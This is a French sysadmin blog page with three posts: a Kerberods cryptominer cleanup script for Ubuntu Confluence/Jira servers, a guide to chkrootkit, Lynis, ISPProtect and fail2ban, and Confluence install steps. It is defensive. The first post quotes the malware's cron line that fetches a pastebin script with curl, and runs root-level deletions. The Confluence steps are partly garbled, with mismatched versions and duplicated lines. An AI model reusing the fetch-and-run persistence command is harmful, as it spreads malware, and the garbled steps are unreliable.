confluence / jira malware clear_kerberods.sh

Accueil » Page 2

J’ai adapté pour ubuntu le script de koamania : https://github.com/koamania.

Le haut de l’iceberg est dans contab la ligne suivante :

*/30 * * * * (curl -fsSL https://pastebin.com ... 

Voici la solution :


 #!/usr/bin/env sh
# os별로 커맨드가 다를 수 있음.
# 크론 서비스 중지
(service crond stop || systemctl restart crond || /etc/init.d/cron  stop)|sh
rm -f /etc/cron.d/root
rm -f /var/spool/cron/root
rm -f /var/spool/cron/crontabs/root


# hook 라이브러리 지우기
rm -f /etc/ld.so.preload
rm -f /usr/local/lib/libcryptod.so
chattr -i /etc/ld.so.preload
rm -f /etc/ld.so.preload
rm -f /usr/local/lib/libcryptod.so


# 비정상 프로세스 삭제
ps -ef | grep -v grep | egrep 'kerberods' | awk '{print $1}' | xargs kill -9
ps -ef | grep -v grep | egrep 'khugepageds' | awk '{print $1}' | xargs kill -9
ps -ef | grep -v grep | egrep 'watchdogs' | awk '{print $1}' | xargs kill -9


# 실행파일 삭제
rm -f /tmp/khugepageds
rm -f /tmp/watchdogs
rm -f /usr/sbin/kerberods
rm -f /usr/bin/kerberods


# 악의적인 서비스 지우기
chkconfig netdns off
update-rc.d netdns stop
chkconfig –del netdns
update-rc.d -f netdns remove
systemctl disable netdns
rm -f /etc/rc.d/init.d/kerberods
rm -f /etc/init.d/netdns


# 동적 링크 라이브러리 업데이트
ldconfig


# 살아날 수 있으니 다시 한번 삭제
ps -ef | grep -v grep | egrep 'kerberods' | awk '{print $1}' | xargs kill -9
ps -ef | grep -v grep | egrep 'khugepageds' | awk '{print $1}' | xargs kill -9
ps -ef | grep -v grep | egrep 'watchdogs' | awk '{print $1}' | xargs kill -9 

service crond start
echo "Remove success, Reboot Required." 

4 outils pour analyser un serveur Ubuntu

Accueil » Page 2

Introduction

Les serveurs voient un niveau constant d’attaques et d’analyses de port à tout moment, alors qu’un pare-feu et des mises à jour régulières du système sont une bonne première couche de défense pour assurer la sécurité du système, mais vous devez également vérifier régulièrement si quelqu’un y entre !. Les outils décrits dans ce didacticiel sont conçus pour ces contrôles de sécurité et permettent de détecter les comportements malveillants, les virus, les rootkits et les comportements malveillants. Vous pouvez les faire fonctionner régulièrement, par exemple toutes les nuits, et vous envoyer des rapports par courrier électronique.

  1. Chkrootkit
  2. Lynis
  3. ISPProtect
  4. fail2ban

1 – Chkrootkit – Un scanner de rootkits Linux

Chkrootkit est un scanner de rootkit classique. Il vérifie sur votre serveur les processus de rootkit suspects et la liste des fichiers de rootkit connus. Vous pouvez installer Chkrootkit à partir du source ou du référentiel officiel Ubuntu. Dans ce tutoriel, nous allons l’installer via un package de référentiel car c’est très simple:

apt-get install chkrootkit 

Pour vérifier votre serveur avec Chkrootkit, exécutez la commande ci-dessous:

chkrootkit 

Il va commencer à vérifier votre système pour les malwares et les rootkits et une fois le processus terminé, vous pouvez voir le rapport. Par conséquent, si vous souhaitez que votre système soit régulièrement analysé par Chkrootkit, vous pouvez créer un travail Cron à l’aide des instructions suivantes. Dans cette section, nous allons créer un travail Cron pour que Chkrootkit analyse votre système une fois par semaine et vous envoie les rapports par courrier électronique. Tout d’abord, ouvrez votre configuration Cron avec la commande suivante

crontab -e 

Collez maintenant la ligne suivante dans le fichier, puis enregistrez et quittez (Assurez-vous de remplacer les parties rouges par votre propre adresse électronique):

0 0 * * 6 /usr/sbin/chkrootkit 2>&1 | mail -s "chkrootkit Reports of my server" you@yourmail.com

Maintenant, votre serveur sera analysé tous les vendredis à minuit et les résultats vous seront envoyés par courrier électronique.

2 – Lynis – Outil d’audit de sécurité universel et scanner Rootkit

Lynis (anciennement rkhunter) est un outil d’audit de sécurité destiné aux systèmes Linux et BSD. Il effectue un audit scrupuleux de nombreux aspects de la sécurité et des configurations de votre système. Nous allons installer Lynis en utilisant le source. Au moment de la rédaction de ce tutoriel, la dernière version stable est «2.5.7», mais vous pouvez toujours obtenir le lien de téléchargement de la dernière version sur son site officiel: https://cisofy.com/downloads/lynis/ Basculez vers le répertoire “opt” pour télécharger le fichier “tar”:

cd /opt/ 

Exécutez les commandes suivantes pour télécharger, extraire et déplacer les fichiers vers un emplacement approprié:

wget https://cisofy.com/files/lynis-2.7.4-100.tar.gz 
tar xvzf lynis-2.7.4-100.tar.gz
mv lynis /usr/local/

Créez un lien symbolique du fichier binaire vers un chemin d’accès exécutable pour un accès facile:

ln -s /usr/local/lynis/lynis /usr/local/bin/lynis 

Maintenant, vous pouvez commencer à analyser votre système avec la commande ci-dessous:

lynis audit system 

Lynis effectuera une analyse complète et vous en montrera un résumé à la fin. Vous pouvez également ajouter un travail Cron pour lynis à l’aide des instructions suivantes: ouvrez votre configuration Cron avec la commande suivante:

crontab -e 

Collez maintenant la ligne suivante dans le fichier, puis enregistrez et quittez (Assurez-vous de remplacer les parties rouges par votre propre adresse électronique):

0 0 * * 6 /usr/local/bin/lynis 2>&1 | mail -s "Lynis Reports of my server" you@yourmail.com 

Maintenant, votre serveur sera analysé tous les vendredis à minuit et les résultats vous seront envoyés par courrier électronique.

ou

apt-get install lynis 

Puis : https://cisofy.com/documentation/lynis/get-started/

3 – ISPProtect – Analyseur de programmes malveillants pour sites Web

ISPProtect est un scanner de logiciels malveillants pour serveurs Web. Il recherche les logiciels malveillants présents dans les fichiers de sites Web et les systèmes de gestion de contenu tels que WordPress, Joomla, Drupal, etc. Si vous exécutez un serveur d’hébergement Web, les sites Web hébergés constituent la partie la plus attaquée de votre serveur. recommandé de faire des contrôles de santé sur eux régulièrement. ISPProtect contient 5 moteurs d’analyse: Analyseur de logiciels malveillants basé sur les signatures. Scanner heuristique de malware. Un scanner pour afficher les répertoires d’installation des systèmes CMS obsolètes. Un scanner qui vous montre tous les plugins WordPress obsolètes sur l’ensemble du serveur. Un analyseur de contenu de base de données qui vérifie le contenu potentiellement malveillant des bases de données MySQL. ISPProtect n’est pas un logiciel gratuit, mais il existe un essai gratuit que vous pouvez utiliser sans enregistrement pour le tester ou nettoyer un système infecté. En outre, ISPProtect nécessite l’installation de PHP sur le serveur. Si vous ne l’avez pas déjà installé, vous pouvez l’installer à l’aide de la commande suivante:

apt-get install php php-cli 

Après avoir installé PHP, vous pouvez installer ISPProtect en exécutant une à une les commandes suivantes:

mkdir -p /usr/local/ispprotect 
cd /usr/local/ispprotect
wget http://www.ispprotect.com/download/ispp_scan.tar.gz
tar xzf ispp_scan.tar.gz
chown -R root:root /usr/local/ispprotect
chmod -R 750 /usr/local/ispprotect

Maintenant, vous pouvez créer un lien symbolique vers votre chemin d’exécutable pour un accès facile:

ln -s /usr/local/ispprotect/ispp_scan /usr/local/bin/ispp_scan

Exécutez la commande suivante pour démarrer ISPProtect:

ispp_scan 

Le scanner vérifie automatiquement les mises à jour, puis demande la clé dans laquelle vous pouvez saisir le mot «ESSAI». Ensuite, il vous sera demandé le chemin de votre site Web, par exemple “/ var / www /” Après cela, l’analyseur commencera à analyser et à vous montrer les éléments infectés. À la fin de l’analyse, les résultats seront stockés dans le répertoire d’installation d’ISPProtect. Pour exécuter ISPProtect en tant que tâche Cron hebdomadaire, vous pouvez suivre les instructions suivantes:

crontab -e

Ajoutez la ligne suivante au fichier puis enregistrez et quittez (Assurez-vous de remplacer les parties rouges par vos propres valeurs)

0 0 * * 6 /usr/local/ispprotect/ispp_scan --update && /usr/local/ispprotect/ispp_scan --path= /var/www --email-results= you@yourmail.com --non-i

4 – Bannir des IP avec fail2ban

Fail2ban est une application qui analyse les logs de divers services (SSH, Apache, FTP…) en cherchant des correspondances entre des motifs définis dans ses filtres et les entrées des logs. Lorsqu’une correspondance est trouvée une ou plusieurs actions sont exécutées. Typiquement, fail2ban cherche des tentatives répétées de connexions infructueuses dans les fichiers journaux et procède à un bannissement en ajoutant une règle au pare-feu iptables pour bannir l’adresse IP de la source.

apt-get install fail2ban 

DROP silencieux au lieux d’un REJECT

sudo printf "[Init]\nblocktype = DROP" > /etc/fail2ban/action.d/iptables-blocktype.local

sudo service fail2ban restart

Installation de Confluence sur Ubuntu server

Accueil » Page 2

Installer Confluence :

wget https://www.atlassian.com/software/confluence/downloads/binary/atlassian-confluence-6.15.4-x64.binchmod 755 atlassian-confluence-6.15.4-x64.bin./atlassian-confluence-6.2.0-x64.bin
Par défaut l’installation se fait dans :/opt/atlassian/confluenceLes datas dans :/var/atlassian/application-data/confluenceAccès http sur 8090

Installer MySQL :

apt install mysql-server

Installer les connecteurs :

cd /usr/local/src
wget https://dev.mysql.com/get/Downloads/Connector-J/mysql-connector-java-5.1.47.tar.gz
tar xf mysql-connector-java-5.1.47.tar.gz
cd mysql-connector-java-5.1.47
cp mysql-connector-java-5.1.47-bin.jar /opt/atlassian/confluence/confluence/WEB-INF/lib

Relancer Confluence :

 apt install mysql-server 

Installer les connecteurs :

cd /usr/local/src
wget https://dev.mysql.com/get/Downloads/Connector-J/mysql-connector-java-5.1.47.tar.gz
tar xf mysql-connector-java-5.1.47.tar.gz
cd mysql-connector-java-5.1.47
cp mysql-connector-java-5.1.47-bin.jar /opt/atlassian/confluence/confluence/WEB-INF/lib

Relancer Confluence :

 systemctl restart confluence